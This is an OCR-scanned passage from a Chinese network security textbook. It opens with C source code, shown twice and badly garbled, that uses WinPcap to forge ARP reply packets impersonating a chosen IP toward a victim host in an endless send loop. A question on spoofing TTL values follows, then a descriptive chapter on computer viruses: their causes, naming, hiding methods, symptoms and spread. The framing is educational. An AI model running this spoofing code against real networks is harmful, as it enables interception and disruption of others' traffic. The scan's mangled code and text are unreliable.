“对 象 / 库 模块 ”文本 框 的 末尾 添加 wpcap. lib packet. lib ws2_32. lib, 如 图 5-20 所 示 。 


常规 | 调试 | oce [3838 | 资源 | 浏览 信息 | 
分 类 : wm -| 刷新 四 
输出 文件 名 : 

Debugy123.cxe 


对 象 库 模块 : 
[|kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib 


I 产生 调试 信息 r RR SBS) EE 
F 增加 镑 接 T 产生 MAP 文件 
厂 允许 配置 文件 

工程 选项 [gj: 


comdlg32.lib advapi32.lib shell32.lib ole32.lib 
oleaut32.lib uuid.lib odbc32.lib odbccp32.lib wpcap.lib — 
iwsock32.lib ws2 32.lib /nologo /subsystem:console 图 


[| 六 ] ws | 


图 5-20 设置 “对 象 / 库 模块 ” 
编译 后 就 会 出 现 如 图 5-21 的 提示 ,IP 地 址 冲突 。 . 


ARP 攻击 的 C 语言 实现 。main. cpp 代码 如 下 。 dy Tiadors - KERR x 
TP ESPIA HARRARNIR. | 
# include < stdlib. h> — -一 = 


# include < stdio. h> _ 
5-21 
# include < pcap. h> 图 提示 信息 


int main() 

(pcap if t *alldevs; // 定 义 一 个 网 络 接口 的 一 个 节点 
pceap if t *d; 

int i-O0,inum- 0,j; 

char errbuf[PCAP ERRBUF SIZE]; 

u char packet[60]; 

pcap t * adhandle; 

if (pcap findalldevs(&alldevs, errbuf) == -1)  /* 获得 设备 列表 */ 
(fprintf(stderr,"Error in pcap findalldevs: % s\n", errbuf); 

exit(1); 

} 

# include < stdlib. h> 

# include < stdio. h> 


实践 


# include < pcap.h> 

int main() 

(pcap_if_t * alldevs; // 定 义 一 个 网 络 接口 的 一 个 节点 
pcap if t *d; 

int i-0,inum- 0,j; 

char errbuf[PCAP ERRBUF SIZE]; 

u char packet[60]; 

pcap t * adhandle; 


if (pcap findalldevs(&alldevs, errbuf) -- - 1) /x 获得 设备 列表 x / 
(fprintf(stderr,"Error in pcap findalldevs: % s\n", errbuf); 

exit(1);) 

for(d- alldevs; d != NULL; d= d-» next) /* 打印 列表 * / 


{printf("%d. %s", ++i, d—> name); 

if (d-> description) 

printf(" ( %s)\n", d-> description); 

else 

printf(" (No description available) Wn"); 

) 

if (i == 0) 

{printf("\nNo interfaces found! Make sure WinPcap is installed. Wn"); 

return 0; 

$ 

printf ("Enter the interface number (1- %d):", i); 

scanf(" %d", &inum); 

for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++); /* 跳 转 到 选中 的 适配器 * / 
/* 打开 适配器 * / 

if ( (adhandle- pcap_open_live(d-> name，// 设 备 名 

65536，// 要 捕捉 的 数据 包 的 部 分 

//65535 保证 能 捕获 到 不 同 数据 链 路 层 上 的 每 个 数据 包 的 全 部 内 容 

1，// 混 杂 模 式 

1000，// 读 取 超 时 时 间 

errbuf // 错 误 缓 冲 池 

)) == NULL) 

{ 

fprintf(stderr, "\nUnable to open the adapter. % s is not supported by WinPcap\n", d-> name); 
pcap freealldevs(alldevs); 

return -1; 

} 

printf ("ff A tk Xi d; 77 BtJ MAC Hb ht (40 FF — FF — FF — FF — FF — FF 则 为 广播 )\n"); 

scanf(" &2x- &2x- &2x- &2x- &2x- *2x",&packet[0], &packet[1], &packet[2], &packet[3], 
&packet[4], &packet[5]) ; 

/* 以 太 网 目的 地 址 * / 

packet[6] = 0x0e; /* 伪造 以 太 网 源 地 址 * / 
packet[7] = 0x07; 

packet[8] = 0X62; 

packet[9] = 0x00; 

packet[10] = 0X01; 

packet[11]- 0x12; 

packet[12] = 0x08; /* 帧 类 型 ,0806 表示 ARP 协议 / 
packet[13] = 0x06; 

packet[14] = 0x00; /* 硬件 类 型 ,0001 以 太 网 * / 


packet[15] = 0x01; 


packet[16] = 0x08; /* 协议 类 型 ,0800IP 协 议 * / 
packet[17] = 0x00; 

packet[18] = 0x06; / * 硬件 地 址 长 度 * / 

packet[19] = 0x04; / * 协议 地 址 长 度 * / 

packet[20] = 0x00; /* op,01 表示 请 求 , 02 表示 回复 * / 


packet[21] = 0x02; 

for(i-22;1428;i«*)/ x 发 送 端 以 太 网 地 址 , 同 首部 中 以 太 网 源 地 址 * / 

{ 

packet[i] = packet[i- 16]; 

} 

printf(" 输 入 要 假冒 的 ip 地 址 \n"); /# 发 送 端 IP 地址 * / 
Scanf(" % d. % d. % d. % d", &packet[28], &packet[29], &packet[30], &packet[31]); 
for(i=32;i<38;i++)/* 目 的 以 太 网 地 址 , 同 首部 中 目的 地 址 * / 

{ 

packet[i] = packet[i- 32]; 

) 

printf(" 输 入 被 攻击 方 的 ip 地址 \n")， /* 目的 IP 地 址 ,手动 输入 * / 
scanf(" % d. % d. % d. % d", &packet[38], &packet[39], &packet[40], &packet[41]); 
for(j= 42;j<60;j++)/* 填充 数据 * / 

{ 

packet[ j] = 0x00; 

) 

for(i=0;i<60;it+)/* 在 屏幕 上 输出 数据 报 */ 

{ 

printf(" %x ",packet[i]); 

) 

//int k= 10; 

while(1) / * 发 送 数据 报 * / 

{ 

pcap sendpacket(adhandle, packet,60 ); ”// 装 有 要 发 送 数据 的 缓冲 区 ,要 发 送 长 度 和 一 个 适配器 
printf("OKVn"); 

_sleep(1000); 

/x=-; 

) 

pcap close(adhandle); 

return 0; 


) 

【问题 5-1] 假设 有 人 正在 通过 ping 获得 对 方 操作 系统 信息 ,其 重要 的 依据 之 一 就 是 
TTL 值 。 请 问 如何 通 过 注册 表 操作 修改 TTL 值 以 迷惑 对 方 ? 除了 TTL 值 ,还 有 哪些 通过 
ping 命令 获取 操作 系统 信息 的 依据 ? (参考 第 2 章 问 题 ) 
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p 计算 机 病毒 


计算 机 病毒 基本 上 是 1980 年 初出 现 的 ,到 如 今 已 经 大 肆 草 延 。 计 
算 机 病毒 的 危害 性 猛烈 地 冲击 人 们 对 计算 机 系统 的 信心 。 


6.1 计算 机 病毒 产生 的 原因 


计算 机 病毒 产生 的 原因 主要 有 以 下 几 种 。 

(1) 病毒 制造 者 对 病毒 程序 的 好 奇 与 偏好 ,也 有 的 是 为 了 满足 自己 
的 表现 欲 ,故意 编制 出 一 些 特殊 的 计算 机 程序 ,让 别人 的 电脑 出 现 一 些 
动画 ,或 播放 声音 ,或 提出 问题 让 使 用 者 回答 。 而 此 种 程序 流传 出 去 就 
演变 成 了 计算 机 病毒 ,此 类 病毒 破坏 性 一 般 不 大 。 

(2) 个 别人 的 报复 心理 。 如 有 人 因为 购买 的 一 些 杀 病毒 软件 的 性 能 
并 不 如 厂家 所 说 的 那么 强大 ,于 是 处 于 报复 目的 ,自己 编写 了 一 个 能 如 
过 当时 各 种 杀 病 毒 软件 并 且 破 坏 力 极 强 的 病毒 ,使 电脑 用 户 遭 受 巨 大 灾 
难 和 损失 。 

(3) 一 些 商 业 软 件 公司 为 了 不 让 自己 的 软件 被 非法 复制 和 使 用 ,在 
软件 上 运用 了 加 密 和 保护 技术 ,并 编写 了 一 些 特殊 程序 附 在 正版 软件 
上 ,如 遇 到 非法 使 用 , 则 此 类 程序 将 自动 激活 ,并 对 盗用 者 的 电脑 系统 进 
行 干扰 和 破坏 ,如 巴基斯坦 病毒 、 江 民 KV 逻辑 炸弹 等 。 

(4) 恶作剧 的 心理 。 有 些 编程 人 员 在 无 聊 时 出 于 游戏 的 心理 编制 了 
一 些 有 一 定 破 坏 性 的 小 程序 ,并 用 此 类 程序 相互 制造 恶作剧 ,就 形成 了 
一 类 新 的 病毒 ,如 最 早 的 “ 磁 世 大战 ?就 是 这 样 产生 的 。 

(5) 用 于 研究 或 实验 某 种 计算 机 产品 而 设计 的 “有 专门 用 途 的 ? 程 
序 , 比 如 远程 监控 程序 代码 ,就 是 由 于 某 种 原因 失去 控制 而 扩散 出 来 ,经 
过 用 心 不 良 的 人 改编 后 成 为 了 具有 很 大 危害 的 木马 病毒 程序 。 

(6) 由 于 政治 、 经 济 和 军事 等 特殊 原因 ,一些 组 织 或 个 人 编制 的 一 些 
病毒 程序 用 于 攻击 敌 方 电脑 ,给 敌 方 造成 灾难 或 直接 性 的 经 济 损失 。 比 
如 2010 年 伊朗 国内 大 约 3 万 个 互联 网 终端 感染 Stuxnet 蠕虫 病毒 ,专家 
分 析 后 认为 这 种 病毒 相当 复杂 , 它 更 像 是 出 自 一 个 浩大 的 “政府 工程 ”， 
而 非 黑客 个 人 行为 ,目的 是 “配合 西方 针对 伊朗 的 电子 战 ?。2013 年 斯 诺 
登 事件 证 实 了 很 多 类 似 这 种 猜测 的 真实 性 。 


6.2 计算 机 病毒 的 定义 及 命名 
6.2.1 计算 机 病毒 的 定义 


计算 机 病毒 不 是 自然 存在 的 ,是 某 些 人 利用 计算 机 软 、 硬 件 所 固有 的 脆弱 性 编制 的 具有 
特殊 功能 的 程序 。 由 于 它 与 生物 医学 上 的 “病毒 "同样 有 传染 和 破坏 的 特性 ,因此 这 一 名 词 
由 生物 医学 上 的 “病毒 "概念 引申 而 来 。 

从 不 同和 角度 可 以 给 出 计算 机 病毒 的 不 同 定义 ,一 种 定义 是 通过 磁盘 、 磁 带 和 网 络 等 作为 
媒介 传播 扩散 ,能 “传染 ”其 他 程序 的 程序 ; 另 一 种 是 能 够 实现 自身 复制 且 借 助 一 定 载体 存 
在 的 具有 潜伏 性 、 传 染 性 和 破坏 性 的 程序 ; 还 有 的 定义 是 一 种 人 为 制造 的 程序 , 它 通 过 不 同 
的 途径 潜伏 或 寄生 在 存储 媒体 (如 磁盘 内存 ) 或 程序 里 , 当 某 种 条 件 或 时 机 成 熟 时 , 它 会 
动 复制 并 传播 ,使 计算 机 的 资源 受到 不 同 程度 的 破坏 等 。 

这 些 说 法 在 某 种 意义 上 借用 了 生物 学 病毒 的 概念 ,计算 机 病毒 同 生物 病毒 所 相似 之 处 
是 能 够 侵入 计算 机 系统 和 网 络 ,危害 正常 工作 的 “病原 体 ”。 它 能 够 对 计算 机 系统 进行 各 种 
破坏 ,同时 能 够 自我 复制 ,具有 传染 性 。 所 以 ,计算 机 病毒 就 是 能 够 通过 某 种 途径 潜伏 在 计 
算 机 存储 介质 (或 程序 ) 里 , 当 达 到 某 种 条 件 时 即 被 激活 的 ,对 计算 机 资源 具有 破坏 作用 的 一 
组 程序 或 指令 集合 。 

而 从 广义 上 定义 , 凡 能 够 引起 计算 机 故障 ,破坏 计算 机 数据 的 程序 统称 为 计算 机 病毒 。 
依据 此 定义 ,诸如 逻辑 炸弹 .里 虫 等 均 可 称 为 计算 机 病毒 。 

1994 年 2 月 18 日 ,我 国正 式 颁布 实施 了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 
例 ), 在 (条例) 第 三 十 八条 中 明确 指出 :“ 计 算 机 病毒 ,是 指 编制 或 者 在 计算 机 程序 中 插入 的 
破坏 计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 
代码 .” 此 定义 具有 法 律 性 、 权 威 性 。 

计算 机 病毒 是 一 个 程序 ,一 段 可 执行 码 。 就 像 生物 病毒 一 样 ,计算 机 病毒 有 独特 的 复制 
能 力 。 计 算 机 病毒 可 以 很 快 地 蔓延 ,又 常常 难以 根除 。 它 们 能 把 自身 附着 在 各 种 类 型 的 文 
件 上 。 当 文件 被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,它们 就 随同 文件 一 起 蔓延 开 来 。 
除 复制 能 力 外 , 某 些 计 算 机 病毒 还 有 其 他 一 些 共同 特性 ,例如 一 个 被 污染 的 程序 能 够 传送 病 
毒 载 体 。 当 病毒 载体 似乎 仅仅 表现 在 文字 和 图 像 上 时 ,它们 可 能 也 已 毁坏 了 文件 .格式 化 了 
硬盘 驱动 或 引发 了 其 他 类 型 的 灾害 。 若 病毒 并 不 寄生 于 一 个 污染 程序 , 它 仍然 能 通过 占据 
存储 空间 给 用 户 带 来 麻烦 ,并 降低 计算 机 的 全 部 性 能 。 


6.2.2 计算 机 病毒 的 命名 


1. 常用 的 命名 方法 


对 病毒 命名 ,各 个 反 毒 软件 企业 的 标准 不 尽 相同 ,有 时 不 同 的 软件 会 对 一 种 病毒 报 出 不 
同 的 名 称 。 但 给 病毒 起 名 的 方法 主要 包括 以 下 几 种 。 
CD 按 病毒 发 作 的 时 间 命 名 。 这 种 命名 取决 于 病毒 表现 或 破坏 系统 的 发 作 时 间 , 这 类 


实践 


病毒 的 表现 或 破坏 部 分 一 般 为 定时 炸弹 。 如 “黑色 星期 五 ”就 是 因为 其 在 某 月 的 13 日 恰 逢 
星期 五 时 执行 破坏 而 得 名 ; 又 如 “ 米 氏 ”病毒 ,其 病毒 发 时 间 是 3 月 6 日 ,而 3 月 6 日 是 世界 
著名 艺术 家 米 开 朗 基 罗 的 生日 ,于 是 得 名 “ 米 氏 ”病毒 。 

(2) 按 病 毒 发 作 症 状 命 名 , 即 以 病毒 发 作 时 的 表现 现象 来 命名 。 如 “小 球 ” 病 毒 ,是 因为 
该 病毒 发 作 时 屏幕 上 出 现 小 球 不 停 地 运动 而 得 名 ; 又 如 “火炬 ”病毒 ,是 因为 该 病毒 病 发 作 
时 屏幕 上 出 现 五 支 闪烁 的 火炬 而 得 名 ; 再 如 Yankee 病毒 ,因为 该 病毒 激发 时 将 演奏 
Yankee Doodle 乐曲 而 得 名 

(3) 按 病毒 自身 包含 的 标志 命名 , 即 以 病毒 中 出 现 的 字符 串 ,病毒 标识 、 存 放 位 置 或 病 
发 表现 时 病毒 自身 宣布 的 名 称 来 命名 。 如 “大 麻 " 病 毒 中 含有 Mar_ijunana 及 Stoned 字样 ， 
所 以 人 们 将 该 病毒 命名 为 Marijunana( 译 为 “大 麻 ”) 和 Stoned 病毒 ; 又 如 Liberty 病毒 ,是 
因为 该 病毒 中 含有 该 标识 而 得 名 ; 再 如 DiskKiller 病毒 ,该 病毒 自称 为 DiskKiller( 磁 盘 杀 
手 )。CIH 病毒 是 由 刘 韦 麟 博士 命名 的 ,因为 病毒 程序 的 首位 是 CIH, 

CA) 按 病 毒 发 现 地 命名 ,好 以 病毒 首先 发 现 的 地 点 来 命名 。 如 “黑色 星期 五 ”又 称 
Jurusalem( 耶 路 撒 冷 ) 病 毒 ,是 因为 该 病毒 首先 在 Jurusalem 发 现 ; 又 如 Vienna( 维 也 纳 ) 病 
毒 是 首先 在 维也纳 发 现 的 。 

(5) 按 病 毒 的 字 节 长 度 命名 , 即 以 病毒 传染 文件 时 文件 的 增加 长 度 或 病毒 自身 代码 的 
长 度 命 名 ,如 1575、2153、1701、1704、1514、4096 等 。 


2. 国际 上 对 病毒 命名 的 惯例 


一 般 格式 为 : 二 病毒 前 级 二 . 二 病毒 名 称 二 . 二 病毒 后 级 二 。 

前 级 表示 该 病毒 发 作 的 操作 平台 或 者 病毒 的 类 型 ,而 DOS 下 的 病毒 一 般 是 没有 前 级 
的 ; 病毒 名 称 为 该 病毒 的 名 称 及 其 家 族 ; 后 组 一 般 可 以 不 要 ,只 是 以 此 区 别 在 该 病毒 家 族 
中 各 病毒 的 不 同 ,可 以 为 字母 ,或 者 为 数字 以 说 明 此 病毒 的 大 小 。 

例如 WM. Cap. A. A 表示 在 Cap 病毒 家 族 中 的 一 个 变种 , WM 表示 该 病毒 是 一 个 
Word 宏 病 毒 。 


3. 常见 病毒 类 型 


1) 系统 病毒 

。 前 级 : Win32,PE 等 。 

特征 : 可 以 感染 Windows 操作 系统 的 exe 与 dll 文件 ,并 通过 这 些 文件 的 执行 进行 
复制 和 传播 。 

2) 蠕虫 病毒 

前 级 : Worm, 

特征 : 通过 网 络 或 系统 安全 漏洞 进行 传播 ,大 部 分 该 类 病毒 均 具 有 大 量 向 外 发 送 被 
感染 邮件 /文件 的 功能 ,从 而 使 计算 机 运行 速度 下 降 甚至 堵塞 网 络 。 

3) 木马 病毒 /黑客 病毒 

* 前 级 : Trojan/ Hack。 

特征 : 木马 病毒 通过 网 络 或 系统 漏洞 进入 用 户 操 作 系统 并 隐藏 起 来 ,然后 寻找 机 会 
向 外 界 泄露 用 户 敏 感 信 息 ; 黑客 病毒 则 能 对 用 户 的 电脑 进行 远程 监视 及 控制 。 前 


ZH PSW/PSD 之 类 的 病毒 一 般 都 专门 用 于 资 取 用 户 密 码 。 

4) 脚本 病毒 

* 前 级 : Script. 

* 特征 : 使 用 网 页 脚本 语言 编写 ,通过 网 页 进行 传播 。 

DEI 

° 前 级 : Macro, 

。 特征 : 能 感染 Office 系列 文档 ,并 通过 文档 文件 进行 传播 。 

6) 后 门 病毒 

* 前 级 : BackDoor。 

。 特征 : 通过 网 络 传播 ,给 系统 开 后 门 ,给 用 户 电 脑 带 来 安全 隐患 。 

7) 病毒 种 植 程序 

* 前 级 : Dropper 

* 特征 : 运行 时 会 释放 出 一 个 或 几 个 新 的 病毒 到 用 户 系统 中 ,由 释放 出 来 的 新 病毒 产 
生 破 坏 。 

8) 破坏 性 程序 病毒 

* 前 级 : Harm, 

° 特征 : 本 身 具 有 好 看 的 图 标 来 吸引 用 户 , 当 用 户 单 击 时 ,病毒 便 会 直接 对 用 户 计算 
机 系统 进行 破坏 ,如 自动 格式 化 磁盘 、 破 坏 系 统 文件 等 。 

9) 玩笑 病毒 

* 前 级 : Joke 

* 特征 : 也 称 恶 作 剧 病毒 ,特性 是 病毒 会 做 出 各 种 模拟 性 的 破坏 操作 来 吓 距 用 户 , 其 
实 并 没有 对 用 户 电 脑 进行 任何 实质 上 的 破坏 。 

10) 捆绑 机 病毒 

° 前 级 : Binder, 

。 特征 : 使 用 特定 的 捆绑 程序 将 病毒 与 一 些 用 户 常 用 的 应 用 程序 (如 QQ、IE) 捆 绑 起 
来 ,表面 上 是 正常 的 执行 文件 , 当 用 户 运行 这 些 文件 时 ,在 表面 上 正常 运行 这 些 程 
序 , 同 时 隐藏 运行 捆绑 在 一 起 的 病毒 ,从 而 给 用 户 造成 危害 。 


6.3 计算 机 病毒 的 特征 


1. 非 授权 可 执行 性 


用 户 通常 调用 执行 一 个 程序 时 ,把 系统 控制 交 给 这 个 程序 ,并 分 配给 它 相 应 的 系统 资 
源 ,如 内 存 ,从 而 使 之 能 够 运行 完成 用 户 的 需求 ,因此 程序 执行 的 过 程 对 用 户 是 透明 的 。 而 
计算 机 病毒 是 非法 程序 ,正常 用 户 是 不 会 明知 是 病毒 程序 ,而 故意 调用 执行 的 。 但 由 于 计算 
机 病毒 具有 正常 程序 的 一 切 特性 ,包括 可 存储 性 、 可 执行 性 , 它 隐 藏 在 合法 的 程序 或 数据 中 ， 
当 用 户 运 行 正常 程序 时 ,病毒 伺机 窃取 到 系统 的 控制 权 , 得 以 抢先 运行 ,然而 此 时 用 户 还 认 
为 是 在 执行 正常 程序 。 这 也 是 病毒 与 远程 控制 软件 最 重要 的 区 别 之 一 。 


实践 


2. 隐蔽 性 


计算 机 病毒 是 一 种 具有 很 高 的 编程 技巧 短小精悍 的 可 执行 程序 。 它 通常 粘 附 在 正常 
程序 或 磁盘 引导 扇 区 ,或 者 磁盘 上 标 为 坏 复 的 扇 区 ,以 及 一 些 空闲 概率 较 大 的 扇 区 中 ,这 是 
它 的 非法 可 存储 性 。 病 毒 想方设法 隐藏 自身 ,就 是 为 了 防止 用 户 察觉 。 最 基本 的 隐藏 组 合 
是 不 可 见 窗 体 与 隐藏 文件 。 病 毒 的 隐藏 方式 主要 如 下 所 述 。 

(1) 伪装 成 系统 文件 。 

(2) 将 木马 病毒 的 服务 端 伪装 成 系统 服务 。 

(3) 将 木马 程序 加 载 到 系统 文件 中 。 

(4) Win. ini, system. ini, 

(5) 充分 利用 端口 隐藏 。 

(6) 隐藏 在 注册 表 中 。 

(7) 自动 备份 。 

(8) 木马 程序 于 其 他 程序 绑 定 。 

(9)“ 穿 墙 术 ”。 

(10) 利用 远程 线程 的 方式 隐藏 。 

COLD 通过 拦截 系统 功能 调用 的 方式 来 隐藏 自己 。 

(12) 攻击 杀毒 软件 。 


3. 传染 性 


传染 性 是 计算 机 病毒 最 重要 的 特征 ,是 判断 一 段 程序 代码 是 否 为 计算 机 病毒 的 依据 。 
病毒 程序 一 旦 侵入 计算 机 系统 ,就 开始 搜索 可 以 传染 的 程序 或 者 磁 介 质 , 然 后 通过 自我 复制 
迅速 传播 。 由 于 目前 计算 机 网 络 日 益 发 达 , 计 算 机 病毒 可 以 在 极 短 的 时 间 内 通过 像 
Internet 这 样 的 网 络 传 遍 世界 。 


4. 潜伏 性 


计算 机 病毒 具有 依附 于 其 他 媒体 而 寄生 的 能 力 , 这 种 媒体 称 为 计算 机 病毒 的 宿主 。 依 
靠 病毒 的 寄生 能 力 ,病毒 传染 合法 的 程序 和 系统 后 ,不 立即 发 作 , 而 是 悄悄 隐藏 起 来 ,然后 在 
用 户 不 察觉 的 情况 下 进行 传染 。 病 毒 的 潜伏 性 越 好 , 它 在 系统 中 存在 的 时 间 也 就 越 长 ,病毒 
传染 的 范围 也 越 广 ,其 危害 性 也 越 大 。 


5. 表现 性 或 破坏 性 


无 论 何 种 病毒 程序 ,一 旦 侵入 系统 ,都 会 对 操作 系统 的 运行 造成 不 同 程度 的 影响 。 
即使 不 直接 产生 破坏 作用 的 病毒 程序 ,也 要 占用 系统 资源 (如 占用 内 存 空 间 、 占 用 磁盘 存 
储 空间 以 及 系统 运行 时 间 等 )。 绝 大 多 数 病毒 程序 要 显示 一 些 文字 或 图 像 ,影响 系统 的 
正常 运行 ; 还 有 一 些 病毒 程序 会 删除 文件 ,加 密 磁盘 中 的 数据 ,其 至 摧毁 整个 系统 和 数 
据 , 使 之 无 法 恢复 ,造成 无 可 挽回 的 损失 。 因 此 ,病毒 程序 的 副作用 轻 者 降低 系统 工作 效 
率 , 重 者 导致 系统 崩溃 数据 丢失 。 病 毒 程序 的 表现 性 或 破坏 性 体现 了 病毒 设计 者 的 真 
正 意 图 。 


6. 可 触发 性 


计算 机 病毒 一 般 都 有 一 个 或 者 几 个 触发 条 件 。 满 足 其 触发 条 件 或 者 激活 病毒 的 传染 机 
制 , 即 可 使 之 进行 传染 ,或 者 激活 病毒 的 表现 部 分 或 破坏 部 分 。 触 发 的 实质 是 一 种 条 件 的 控 
制 , 病 毒 程序 可 以 依据 设计 者 的 要 求 在 一 定 条 件 下 实施 攻击 ,这 个 条 件 可 以 是 敲 入 特定 字 
符 、 使 用 特定 文件 、 某 个 特定 日 期 或 特定 时 刻 , 或 者 是 病毒 内 管 的 计数 器 达到 一 定 次 数 等 。 


7. 不 可 预见 性 


不 同 种 类 的 病毒 ,其 代码 千差万别 ,但 有 些 操作 是 共有 的 。 因 此 ,有 的 人 利用 病毒 的 共 
性 制作 了 检测 病毒 的 软件 。 但 是 由 于 病毒 的 更 新 极 快 ,这 些 软件 也 只 能 在 一 定 程 度 上 保护 
系统 。 

所 以 病毒 对 于 反 病 毒 软件 而 言 永远 是 超前 的 。 


6.4 计算 机 病毒 的 症状 及 危害 


计算 机 病毒 是 一 段 代 码 ,虽然 可 能 隐藏 得 很 好 ,但 也 会 留 下 许多 痕迹 。 通 过 对 这 些 痕 迹 
进行 观察 和 判别 ,就 能 够 发 现 病毒 。 


6.4.1 可 能 传播 病毒 的 途径 


可 能 传播 病毒 的 途径 有 以 下 几 种 。 

CD 不 可 移动 的 硬件 设备 。 这 些 设备 通常 有 计算 机 的 专用 ASIC 芯片 和 硬盘 等 。 这 种 
病毒 通过 不 可 移动 的 计算 机 硬件 设备 进行 传播 ,虽然 极 少 ,但 破坏 力 却 极 强 。 

(2) 移动 存储 设备 。 在 移动 存储 设备 中 ,U 盘 是 使 用 最 广泛 移动 最 频繁 的 存储 介质 , 因 
此 也 成 了 计算 机 病毒 寄生 的 “温床 "。 目 前 ,大 多 数 计算 机 都 是 从 这 类 途径 感染 病毒 的 。 

(3) 网 络 。Internet 的 发 展 使 病毒 可 能 成 为 灾难 ,病毒 的 传播 更 迅速 ,通过 计算 机 网 络 
进行 传播 , 反 病 毒 的 任务 更 加 艰巨 。Internet 带 来 不 同 的 安全 威胁 ,一 种 威胁 来 自 文件 下 
载 ,这 些 被 浏览 的 或 是 通过 FTP 下 载 的 文件 中 可 能 存在 病毒 ; 另 一 种 威胁 来 自 电子 邮件 ， 
XA Internet 邮件 系统 提供 了 在 网 络 间 传 送 附带 格式 化 文档 邮件 的 功能 ,因此 ,遭受 病毒 
的 文档 或 文件 就 可 能 通过 网 关 和 邮件 服务 器 涌 和 人 企业 网 络 ; 最 后 甚至 简单 到 通过 浏览 器 浏 
览 网 页 都 有 可 能 感染 病毒 ,网 络 使 用 的 简易 性 和 开放 性 使 得 这 种 威胁 越 来 越 严重 。 

(4) 点 对 点 通信 系统 和 无 线 通道 。 病 毒 可 以 通过 点 对 点 通信 系统 和 无 线 通道 传播 。 随 
着 移动 互联 网 的 快速 发 展 , 黑 客 也 将 其 视 为 所 取经 济 利益 的 重要 目标 。2011 年 ,CNCERT 
捕获 移动 互联 网 恶意 程序 6249 个 , 较 2010 年 增加 超过 两 倍 。 其 中 ,恶意 扣 费 类 恶意 程序 数 
量 最 多 ,为 1317 个 , 占 21.08%; 其 次 是 恶意 传播 类 、 信 息 窃 取 类 流氓 行为 类 和 远程 控制 类 。 


6.4.2 计算 机 病毒 的 症状 


根据 病毒 感染 和 发 作 的 阶段 ,计算 机 病毒 的 症状 可 以 分 为 计算 机 病毒 发 作 前 、 病 毒 发 作 


实践 


时 和 病毒 发 作 后 症状 3 个 阶段 。 
1. 计算 机 病毒 发 作 前 的 症状 


病毒 发 作 前 是 指 计算 机 病毒 感染 计算 机 系统 ,从 潜伏 在 系统 内 开始 计算 ,一 直到 激发 条 
件 满足 ,计算 机 病毒 发 作 之 前 的 一 个 阶段 。 

在 这 个 阶段 ,计算 机 病毒 的 行为 主要 是 以 潜伏 和 传播 为 主 。 计 算 机 病毒 会 各 种 各 样 的 
手法 来 隐藏 自己 ,在 不 被 发 现 的 同时 ,又 自我 复制 ,并 以 各 种 手段 进行 传播 。 

计算 机 病毒 发 作 前 常见 的 症状 如 下 。 

CD 计算 机 运行 速度 变 慢 。 在 硬件 设备 没有 损坏 或 更 换 的 情况 下 ,本 来 运行 速度 很 快 
的 计算 机 运行 同样 的 应 用 程序 时 速度 明显 变 慢 ,而 且 重 启 后 依然 很 慢 。 这 就 可 能 是 计算 机 
病毒 占用 了 大 量 的 系统 资源 ,并 且 自 身 的 运行 占用 了 大 量 的 处 理 器 时 间 ,造成 了 系统 资源 不 
足 , 运 行 变 慢 。 

(2) 以 前 能 正常 运行 的 软件 经 常 发 生 内 存 不 足 的 错误 。 某 个 以 前 能 正常 运行 的 程序 ， 
程序 激活 时 或 使 用 应 用 程序 中 的 某 个 功能 时 报告 内 存 不 足 。 这 很 可 能 是 由 于 计算 机 病毒 驻 
留 后 占用 了 系统 中 大 量 的 内 存 空 间 造 成 的 。 

(3) 平时 运行 正常 的 计算 机 经 常 死 机 。 病 毒 感染 了 计算 机 后 ,将 自身 驻 留 在 系统 内 并 
修改 了 中 断 处 理 程序 等 ,就 会 引起 系统 工作 不 稳定 ,造成 死机 现象 。 

(4) 操作 系统 无 法 正常 激活 。 关 机 后 激活 ,操作 系统 报告 缺少 必要 的 激活 文件 ,或 者 激 
活 文 件 受 损 ,系统 无 法 激活 。 这 就 很 可 能 是 计算 机 病毒 感染 系统 文件 后 使 文件 结构 发 生 了 
变化 ,无 法 实施 操作 系统 加 载 和 引导 。 

(5) 打印 和 通信 发 生 异 常 。 在 硬件 没有 更 改 或 损坏 的 情况 下 ,以 前 工作 正常 的 打印 机 ， 
发 现 无 法 进行 打印 操作 ,或 打印 出 来 的 是 乱码 ; 串口 设备 无 法 正常 工作 ,比如 调制 解 调 器 不 
能 拨号 。 这 些 很 可 能 是 由 于 计算 机 病毒 驻 留 内 存 后 占用 了 打印 端口 `. 串 行 通信 端口 的 中 断 
服务 程序 ,使 它 不 能 够 正常 工作 。 


2. 病毒 发 作 时 的 症状 


计算 机 病毒 发 作 时 是 指 满足 了 计算 机 病毒 发 作 的 条 件 ,病毒 被 激活 ,病毒 程序 开始 实施 
破坏 行为 的 阶段 。 

计算 机 病毒 发 作 时 的 表现 各 不 相同 ,发 作 时 常见 的 一 些 症 状 如 下 。 

(1) 产生 特定 的 图 像 。 单 纯 产 生 图 像 的 计算 机 病毒 大 多 是 良性 病毒 ,只 是 在 发 作 时 破 
坏 用 户 的 显示 界面 ,干扰 用 户 的 正常 工作 。 

(2) 硬盘 灯 不 断 闪烁 。 硬 盘 灯 闪烁 说 明 有 硬盘 读 写 操作 。 有 的 计算 机 病毒 会 在 发 作 时 
对 磁盘 进行 格式 化 ,或 者 写 人 垃圾 文件 ,等 等 ,致使 硬盘 上 的 数据 遭 到 损失 。 这 个 时 候 硬盘 
灯 就 会 不 正常 地 不 断 闪 烁 。 这 一 般 是 恶性 病毒 。 

(3) 程序 运行 速度 下 降 。 病 毒 激活 时 ,病毒 内 部 的 时 间 延 迟 程序 启动 。 

(4) 占用 大 量 内 存 。 

(5) 计算 机 突然 死机 或 者 重启 。 

(6) 破坏 文件 。 有 些 病毒 激活 时 .用 户 打 不 开 文件 ,或 删除 正在 运行 着 的 文件 ,也 可 能 
更 改 文件 的 内 容 。 


(7) 鼠标 自己 动 。 

(8) 桌面 图 标 发 生变 化 。 
(9) 干扰 打印 机 。 

(10) 可 能 强迫 用 户 玩 游戏 。 
(11) 自动 发 送 邮 件 。 


6.4.3 计算 机 病毒 造成 的 危害 


在 计算 机 病毒 出 现 的 初期 ,说 到 计算 机 病毒 的 危害 ,往往 注重 于 病毒 对 信息 系统 的 直接 
破坏 作用 ,比如 格式 化 硬盘 .删除 文件 数据 等 .并 以 此 来 区 分 恶性 病毒 和 良性 病毒 。 其 实 这 
